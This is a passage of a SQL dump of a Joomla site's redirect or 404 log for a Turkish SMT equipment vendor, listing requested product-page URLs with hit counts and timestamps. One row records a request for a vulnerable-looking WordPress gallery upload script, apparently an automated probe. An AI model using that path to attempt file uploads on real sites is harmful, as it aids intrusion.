01:36:26','0000-00-00 00:00:00',301),(10959,'http://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız?language=en-gb',NULL,'','',3,0,'2017-11-11 01:36:28','0000-00-00 00:00:00',301),(10960,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim',NULL,'','',370,0,'2017-11-11 01:36:31','0000-00-00 00:00:00',301),(10961,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,`p`.product_sku',NULL,'','',362,0,'2017-11-11 01:36:33','0000-00-00 00:00:00',301),(10962,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,product_sku',NULL,'','',47,0,'2017-11-11 01:36:34','0000-00-00 00:00:00',301),(10963,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',369,0,'2017-11-11 01:36:35','0000-00-00 00:00:00',301),(10964,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,category_name',NULL,'','',358,0,'2017-11-11 01:36:41','0000-00-00 00:00:00',301),(10965,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,category_name/dirdesc',NULL,'','',359,0,'2017-11-11 01:36:43','0000-00-00 00:00:00',301),(10966,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,mf_name',NULL,'','',362,0,'2017-11-11 01:36:48','0000-00-00 00:00:00',301),(10967,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',360,0,'2017-11-11 01:36:53','0000-00-00 00:00:00',301),(10968,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,ordering',NULL,'','',351,0,'2017-11-11 01:37:03','0000-00-00 00:00:00',301),(10969,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,product_name',NULL,'','',348,0,'2017-11-11 01:37:06','0000-00-00 00:00:00',301),(10970,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,product_name/dirdesc',NULL,'','',347,0,'2017-11-11 01:37:08','0000-00-00 00:00:00',301),(10971,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,product_sku',NULL,'','',343,0,'2017-11-11 01:37:15','0000-00-00 00:00:00',301),(10972,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/dirdesc',NULL,'','',344,0,'2017-11-11 01:37:18','0000-00-00 00:00:00',301),(10973,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/e-bar-26-detail',NULL,'','',177,0,'2017-11-11 01:37:21','0000-00-00 00:00:00',301),(10974,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',176,0,'2017-11-11 01:37:23','0000-00-00 00:00:00',301),(10975,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/e-bar-detail',NULL,'','',186,0,'2017-11-11 01:37:26','0000-00-00 00:00:00',301),(10976,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',185,0,'2017-11-11 01:37:28','0000-00-00 00:00:00',301),(10977,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku?language=tr-tr',NULL,'','',2,0,'2017-11-11 01:39:01','0000-00-00 00:00:00',301),(10978,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',342,0,'2017-11-11 01:39:03','0000-00-00 00:00:00',301),(10979,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',332,0,'2017-11-11 01:39:05','0000-00-00 00:00:00',301),(10980,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',337,0,'2017-11-11 01:39:09','0000-00-00 00:00:00',301),(10981,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',328,0,'2017-11-11 01:39:11','0000-00-00 00:00:00',301),(10982,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,ordering',NULL,'','',324,0,'2017-11-11 01:39:17','0000-00-00 00:00:00',301),(10983,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',333,0,'2017-11-11 01:39:20','0000-00-00 00:00:00',301),(10984,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',343,0,'2017-11-11 01:39:23','0000-00-00 00:00:00',301),(10985,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',339,0,'2017-11-11 01:39:28','0000-00-00 00:00:00',301),(10986,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',336,0,'2017-11-11 01:39:31','0000-00-00 00:00:00',301),(10987,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı?language=tr-tr',NULL,'','',2,0,'2017-11-11 01:39:37','0000-00-00 00:00:00',301),(10988,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız',NULL,'','',355,0,'2017-11-11 01:39:38','0000-00-00 00:00:00',301),(10989,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku',NULL,'','',341,0,'2017-11-11 01:39:40','0000-00-00 00:00:00',301),(10990,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',352,0,'2017-11-11 01:39:41','0000-00-00 00:00:00',301),(10991,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',353,0,'2017-11-11 01:39:46','0000-00-00 00:00:00',301),(10992,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',347,0,'2017-11-11 01:39:47','0000-00-00 00:00:00',301),(10993,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,ordering?language=tr-tr',NULL,'','',1,0,'2017-11-11 01:39:53','0000-00-00 00:00:00',301),(10994,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',356,0,'2017-11-11 01:39:54','0000-00-00 00:00:00',301),(10995,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',360,0,'2017-11-11 01:39:56','0000-00-00 00:00:00',301),(10996,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',359,0,'2017-11-11 01:39:59','0000-00-00 00:00:00',301),(10997,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',365,0,'2017-11-11 01:40:03','0000-00-00 00:00:00',301),(10998,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',367,0,'2017-11-11 01:40:08','0000-00-00 00:00:00',301),(10999,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-11 01:40:11','0000-00-00 00:00:00',301),(11000,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/cs40-detail',NULL,'','',216,0,'2017-11-11 01:40:13','0000-00-00 00:00:00',301),(11001,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/cs40-detail/askquestion?tmpl=component',NULL,'','',208,0,'2017-11-11 01:40:14','0000-00-00 00:00:00',301),(11002,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/le-40v-detail',NULL,'','',216,0,'2017-11-11 01:40:17','0000-00-00 00:00:00',301),(11003,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/le-40v-detail/askquestion?tmpl=component',NULL,'','',221,0,'2017-11-11 01:40:19','0000-00-00 00:00:00',301),(11004,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/ls60v-detail',NULL,'','',217,0,'2017-11-11 01:40:20','0000-00-00 00:00:00',301),(11005,'http://3s-technologies.com.tr/en/?option=com_content&view=article&id=136&itemid=138',NULL,'','',16,0,'2017-11-11 01:41:37','0000-00-00 00:00:00',301),(11006,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_name?language=tr-tr',NULL,'','',2,0,'2017-11-11 01:49:04','0000-00-00 00:00:00',301),(11007,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail',NULL,'','',9,0,'2017-11-11 02:35:35','0000-00-00 00:00:00',301),(11008,'http://3s-technologies.com.tr/tr/urunler/manufacturers/mirae',NULL,'','',54,0,'2017-11-11 02:57:52','0000-00-00 00:00:00',301),(11009,'http://3s-technologies.com.tr/en/products/screen-printer/spr-20-41-42-detail',NULL,'','',28,0,'2017-11-11 03:03:34','0000-00-00 00:00:00',301),(11010,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim',NULL,'','',47,0,'2017-11-11 03:04:24','0000-00-00 00:00:00',301),(11011,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/le-40v-detail',NULL,'','',211,0,'2017-11-11 03:05:16','0000-00-00 00:00:00',301),(11012,'http://3s-technologies.com.tr/en/products/manufacturer/mirae',NULL,'','',23,0,'2017-11-11 03:06:31','0000-00-00 00:00:00',301),(11013,'http://3s-technologies.com.tr/tr/anasayfa/80-turkish-tr/turkish-content',NULL,'','',30,0,'2017-11-11 03:06:38','0000-00-00 00:00:00',301),(11014,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',380,0,'2017-11-11 03:08:10','0000-00-00 00:00:00',301),(11015,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/jvk-detail',NULL,'','',18,0,'2017-11-11 03:08:34','0000-00-00 00:00:00',301),(11016,'http://3s-technologies.com.tr/tr/urunler/screen-printer/spr-20-41-detail',NULL,'','',27,0,'2017-11-11 03:08:38','0000-00-00 00:00:00',301),(11017,'http://3s-technologies.com.tr/en/products/thru-hole/av132-detail',NULL,'','',21,0,'2017-11-11 03:08:41','0000-00-00 00:00:00',301),(11018,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',405,0,'2017-11-11 03:11:42','0000-00-00 00:00:00',301),(11019,'http://3s-technologies.com.tr/en/home2',NULL,'','',25,0,'2017-11-11 03:12:12','0000-00-00 00:00:00',301),(11020,'http://3s-technologies.com.tr/tr/anasayfa/78-turkish-tr?format=feed&type=atom',NULL,'','',3,0,'2017-11-11 03:12:18','0000-00-00 00:00:00',301),(11021,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',57,0,'2017-11-11 03:15:31','0000-00-00 00:00:00',301),(11022,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo',NULL,'','',45,0,'2017-11-11 03:16:12','0000-00-00 00:00:00',301),(11023,'http://3s-technologies.com.tr/en/products/screen-printer/dirdesc',NULL,'','',16,0,'2017-11-11 03:24:10','0000-00-00 00:00:00',301),(11024,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-sn63pb37-0.4mm-29-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-11 03:29:35','0000-00-00 00:00:00',301),(11025,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku?language=tr-tr',NULL,'','',2,0,'2017-11-11 03:36:52','0000-00-00 00:00:00',301),(11026,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın',NULL,'','',235,0,'2017-11-11 03:38:20','0000-00-00 00:00:00',301),(11027,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/mirae_logo_250x250.gif',NULL,'','',1,0,'2017-11-11 03:41:53','0000-00-00 00:00:00',301),(11028,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/npm_250x250.jpg',NULL,'','',8,0,'2017-11-11 03:44:28','0000-00-00 00:00:00',301),(11029,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_cwt_250x250.png',NULL,'','',2,0,'2017-11-11 03:48:40','0000-00-00 00:00:00',301),(11030,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/t_ly8c_250x250.jpg',NULL,'','',1,0,'2017-11-11 03:48:44','0000-00-00 00:00:00',301),(11031,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/logo-ddm_250x250.jpg',NULL,'','',1,0,'2017-11-11 03:55:04','0000-00-00 00:00:00',301),(11032,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,category_name?language=tr-tr',NULL,'','',28,0,'2017-11-11 03:57:02','0000-00-00 00:00:00',301),(11033,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/jvk_250x250.jpg',NULL,'','',1,0,'2017-11-11 03:59:49','0000-00-00 00:00:00',301),(11034,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/avb_12_250x250.jpg',NULL,'','',1,0,'2017-11-11 03:59:53','0000-00-00 00:00:00',301),(11035,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/t_asp-300_250x250.jpg',NULL,'','',1,0,'2017-11-11 03:59:56','0000-00-00 00:00:00',301),(11036,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-11 04:01:53','0000-00-00 00:00:00',301),(11037,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/lfs-1-photo_250x250.gif',NULL,'','',4,0,'2017-11-11 04:02:37','0000-00-00 00:00:00',301),(11038,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/245-k100-28-29-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-11 04:07:34','0000-00-00 00:00:00',301),(11039,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/mirae_logo_250x250.gif',NULL,'','',2,0,'2017-11-11 04:09:43','0000-00-00 00:00:00',301),(11040,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/cm602_250x250.png',NULL,'','',1,0,'2017-11-11 04:12:14','0000-00-00 00:00:00',301),(11041,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/rh6-400x300_250x250.jpg',NULL,'','',1,0,'2017-11-11 04:12:18','0000-00-00 00:00:00',301),(11042,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/ls60v_250x250.gif',NULL,'','',1,0,'2017-11-11 04:13:21','0000-00-00 00:00:00',301),(11043,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/ess-310-left-400x464_250x250.jpg',NULL,'','',2,0,'2017-11-11 04:13:25','0000-00-00 00:00:00',301),(11044,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/rl132_250x250.jpg',NULL,'','',1,0,'2017-11-11 04:13:38','0000-00-00 00:00:00',301),(11045,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',553,0,'2017-11-11 04:19:05','0000-00-00 00:00:00',301),(11046,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-11 04:24:45','0000-00-00 00:00:00',301),(11047,'http://www.3s-technologies.com.tr/tr/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',31,0,'2017-11-11 04:25:25','0000-00-00 00:00:00',301),(11048,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/275-k100-1mm-detail',NULL,'','',29,0,'2017-11-11 04:28:30','0000-00-00 00:00:00',301),(11049,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/spartan-8s-8d-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-11 04:32:39','0000-00-00 00:00:00',301),(11050,'http://www.3s-technologies.com.tr/en/wp-content/plugins/complete-gallery-manager/frames/upload-images.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','',3,0,'2017-11-11 04:39:16','0000-00-00 00:00:00',301),(11051,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name?language=tr-tr',NULL,'','',2,0,'2017-11-11 04:43:27','0000-00-00 00:00:00',301),(11052,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/rh2-20-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-11 04:44:19','0000-00-00 00:00:00',301),(11053,'http://3s-technologies.com.tr/tr/urunler/manufacturers/tolo',NULL,'','',47,0,'2017-11-11 04:51:39','0000-00-00 00:00:00',301),(11054,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku',NULL,'','',6,0,'2017-11-11 05:08:53','0000-00-00 00:00:00',301),(11055,'http://www.3s-technologies.com.tr/en/products/screen-printer/spr-20-detail',NULL,'','',43,0,'2017-11-11 05:09:22','0000-00-00 00:00:00',301),(11056,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/av132_250x250.jpg',NULL,'','',1,0,'2017-11-11 05:32:08','0000-00-00 00:00:00',301),(11057,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı',NULL,'','',256,0,'2017-11-11 05:45:31','0000-00-00 00:00:00',301),(11058,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/jv131-detail',NULL,'','',41,0,'2017-11-11 05:45:37','0000-00-00 00:00:00',301),(11059,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-11 05:58:50','0000-00-00 00:00:00',301),(11060,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/results,1-10',NULL,'','',18,0,'2017-11-11 06:12:11','0000-00-00 00:00:00',301),(11061,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/results,1-40',NULL,'','',19,0,'2017-11-11 06:15:30','0000-00-00 00:00:00',301),(11062,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-11 06:31:24','0000-00-00 00:00:00',301),(11063,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/mi-300-detail/askquestion?tmpl=component',NULL,'','',27,0,'2017-11-11 06:36:25','0000-00-00 00:00:00',301),(11064,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/results,1-5',NULL,'','',3,0,'2017-11-11 06:48:50','0000-00-00 00:00:00',301),(11065,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/results,1-50',NULL,'','',4,0,'2017-11-11 06:52:10','0000-00-00 00:00:00',301),(11066,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo',NULL,'','',65,0,'2017-11-11 07:01:41','0000-00-00 00:00:00',301),(11067,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/cs40-detail?tmpl=component&print=1',NULL,'','',5,0,'2017-11-11 07:09:58','0000-00-00 00:00:00',301),(11068,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/stencil-washer-eco-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-11 07:16:05','0000-00-00 00:00:00',301),(11069,'http://www.3s-technologies.com.tr/en/products/screen-printer/spr-20-detail/askquestion?tmpl=component',NULL,'','',30,0,'2017-11-11 07:21:23','0000-00-00 00:00:00',301),(11070,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/results,1-40',NULL,'','',1,0,'2017-11-11 07:22:10','0000-00-00 00:00:00',301),(11071,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/results,1-40',NULL,'','',2,0,'2017-11-11 07:25:30','0000-00-00 00:00:00',301),(11072,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/results,1-10',NULL,'','',2,0,'2017-11-11 07:28:50','0000-00-00 00:00:00',301),(11073,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/dirdesc',NULL,'','',46,0,'2017-11-11 07:32:10','0000-00-00 00:00:00',301),(11074,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,mf_name',NULL,'','',409,0,'2017-11-11 07:35:30','0000-00-00 00:00:00',301),(11075,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/rh2-detail',NULL,'','',15,0,'2017-11-11 07:52:38','0000-00-00 00:00:00',301),(11076,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-11 08:13:12','0000-00-00 00:00:00',301),(11077,'http://www.3s-technologies.com.tr/en/products/manufacturer/screen-printer',NULL,'','',44,0,'2017-11-11 08:17:21','0000-00-00 00:00:00',301),(11078,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/results,1-50',NULL,'','',3,0,'2017-11-11 08:35:30','0000-00-00 00:00:00',301),(11079,'http://www.3s-technologies.com.tr/index.php/tr/component/content/category?format=feed&type=atom',NULL,'','',1,0,'2017-11-11 08:36:27','0000-00-00 00:00:00',301),(11080,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,mf_name?language=en-gb',NULL,'','',26,0,'2017-11-11 08:49:15','0000-00-00 00:00:00',301),(11081,'http://www.3s-technologies.com.tr/index.php/en/products/rh2-detail?tmpl=component&print=1',NULL,'','',28,0,'2017-11-11 08:54:26','0000-00-00 00:00:00',301),(11082,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/by,product_sku',NULL,'','',45,0,'2017-11-11 08:55:56','0000-00-00 00:00:00',301),(11083,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/avf-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-11 09:01:09','0000-00-00 00:00:00',301),(11084,'http://www.3s-technologies.com.tr/en/products/konveyorler/results,1-10',NULL,'','',5,0,'2017-11-11 09:05:30','0000-00-00 00:00:00',301),(11085,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,product_name',NULL,'','',18,0,'2017-11-11 09:15:00','0000-00-00 00:00:00',301),(11086,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/by,mf_name',NULL,'','',393,0,'2017-11-11 09:27:21','0000-00-00 00:00:00',301),(11087,'http://www.3s-technologies.com.tr/en/products/konveyorler/by,mf_name',NULL,'','',37,0,'2017-11-11 09:32:10','0000-00-00 00:00:00',301),(11088,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/cs40-detail/askquestion?tmpl=component',NULL,'','',54,0,'2017-11-11 09:40:04','0000-00-00 00:00:00',301),(11089,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/by,mf_name?language=en-gb',NULL,'','',19,0,'2017-11-11 09:51:27','0000-00-00 00:00:00',301),(11090,'http://www.3s-technologies.com.tr/en/products/konveyorler/results,1-5',NULL,'','',7,0,'2017-11-11 09:58:50','0000-00-00 00:00:00',301),(11091,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail',NULL,'','',24,0,'2017-11-11 10:19:15','0000-00-00 00:00:00',301),(11092,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/by,category_name',NULL,'','',12,0,'2017-11-11 10:21:41','0000-00-00 00:00:00',301),(11093,'http://www.3s-technologies.com.tr/tr/urunler/am100-detail?tmpl=component&print=1',NULL,'','',39,0,'2017-11-11 10:28:39','0000-00-00 00:00:00',301),(11094,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/mx200lp-detail',NULL,'https://www.google.com.tr/','',241,0,'2017-11-11 10:35:33','0000-00-00 00:00:00',301),(11095,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/lfs-1-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-11 10:51:38','0000-00-00 00:00:00',301),(11096,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',350,0,'2017-11-11 10:55:43','0000-00-00 00:00:00',301),(11097,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole',NULL,'','',126,0,'2017-11-11 11:12:10','0000-00-00 00:00:00',301),(11098,'http://3s-technologies.com.tr/en/products/jvk-detail?tmpl=component&print=1',NULL,'','',17,0,'2017-11-11 11:14:38','0000-00-00 00:00:00',301),(11099,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole',NULL,'','',48,0,'2017-11-11 11:17:47','0000-00-00 00:00:00',301),(11100,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name?language=en-gb',NULL,'','',25,0,'2017-11-11 11:23:19','0000-00-00 00:00:00',301),(11101,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,category_name?language=tr-tr',NULL,'','',1,0,'2017-11-11 11:26:37','0000-00-00 00:00:00',301),(11102,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku',NULL,'','',386,0,'2017-11-11 11:26:59','0000-00-00 00:00:00',301),(11103,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın',NULL,'','',391,0,'2017-11-11 11:27:08','0000-00-00 00:00:00',301),(11104,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',382,0,'2017-11-11 11:27:12','0000-00-00 00:00:00',301),(11105,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',390,0,'2017-11-11 11:27:23','0000-00-00 00:00:00',301),(11106,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name?language=tr-tr',NULL,'','',1,0,'2017-11-11 11:27:37','0000-00-00 00:00:00',301),(11107,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,mf_name',NULL,'','',407,0,'2017-11-11 11:27:44','0000-00-00 00:00:00',301),(11108,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,mf_name/dirdesc',NULL,'','',400,0,'2017-11-11 11:27:49','0000-00-00 00:00:00',301),(11109,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-11 11:27:59','0000-00-00 00:00:00',301),(11110,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_name?language=tr-tr',NULL,'','',1,0,'2017-11-11 11:28:04','0000-00-00 00:00:00',301),(11111,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_sku',NULL,'','',409,0,'2017-11-11 11:28:09','0000-00-00 00:00:00',301),(11112,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/ls60v-detail/askquestion?tmpl=component',NULL,'','',213,0,'2017-11-11 11:28:16','0000-00-00 00:00:00',301),(11113,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,product_name',NULL,'','',363,0,'2017-11-11 11:29:55','0000-00-00 00:00:00',301),(11114,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',365,0,'2017-11-11 11:30:03','0000-00-00 00:00:00',301),(11115,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/dirdesc',NULL,'','',360,0,'2017-11-11 11:30:11','0000-00-00 00:00:00',301),(11116,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın',NULL,'','',386,0,'2017-11-11 11:30:19','0000-00-00 00:00:00',301),(11117,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku',NULL,'','',361,0,'2017-11-11 11:30:25','0000-00-00 00:00:00',301),(11118,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name',NULL,'','',360,0,'2017-11-11 11:31:17','0000-00-00 00:00:00',301),(11119,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',366,0,'2017-11-11 11:31:51','0000-00-00 00:00:00',301),(11120,'http://3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',364,0,'2017-11-11 11:32:11','0000-00-00 